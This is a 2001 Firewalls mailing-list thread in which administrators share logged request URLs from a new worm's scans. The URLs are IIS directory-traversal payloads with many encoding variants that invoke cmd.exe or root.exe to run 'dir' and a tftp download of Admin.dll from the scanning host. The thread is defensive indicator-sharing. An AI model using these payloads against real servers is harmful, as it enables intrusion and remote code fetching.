everyone has
-----Original Message-----
From: Stu [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:49 AM
To: Jose Nazario
Cc: Luke Butcher; [EMAIL PROTECTED]
Subject: Re: something new afoot, sweeping scans:
has anyone seen a payload like this one?
I have been scanned by 59 seperate hosts and they all hit 76 diferent urls
unfortunately every 404 on the server triggers an email.....
this is cut down from the 76 distinct
all the tftp calls were requesting admin.dll from the host that performed
the scan
/_mem_bin/..%255c../..%255c../..%255c../Admin.dll
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20
/_vti_bin/..%255c../..%255c../..%255c../Admin.dll
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
20
/c/Admin.dll
/c/winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20
/d/Admin.dll
/d/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dl
l
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%20
/MSADC/Admin.dll
/MSADC/root.exe?/c+dir
/MSADC/root.exe?/c+tftp%20-i%20
/scripts/..%%35%63../Admin.dll
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%%35c../Admin.dll
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%25%35%63../Admin.dll
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%252f../Admin.dll
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%255c../Admin.dll
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c0%2f../Admin.dll
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c0%af../Admin.dll
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c1%1c../Admin.dll
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c1%9c../Admin.dll
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/Admin.dll
/scripts/root.exe?/c+dir
/scripts/root.exe?/c+tftp%20-i%20
Jose Nazario wrote:
> On Tue, 18 Sep 2001, Luke Butcher wrote:
>
> > Seeing hits from this new worm, looks like it tries circa 30 URLs.
> > Logic looks similar to Code Red II/III, in that most hits are coming
> > from similar class B and C networks.
>
> its a huge shitstorm here. shuttig us down all morning as our firewall
> connection tables are flooded. massive traffic floods ... the whole 9
> yards.
>
> here's the payloads culled from an apache server:
>
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> /c/winnt/system32/cmd.exe?/c+dir
> /d/winnt/system32/cmd.exe?/c+dir
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+C:%5C
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>
> hope that helps.
>
> ____________________________
> jose nazario [EMAIL PROTECTED]
> PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
> PGP key ID 0xFD37F4E5 (pgp.mit.edu)
>
> _______________________________________________
> Firewalls mailing list
> [EMAIL PROTECTED]
> http://lists.gnac.net/mailman/listinfo/firewalls
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
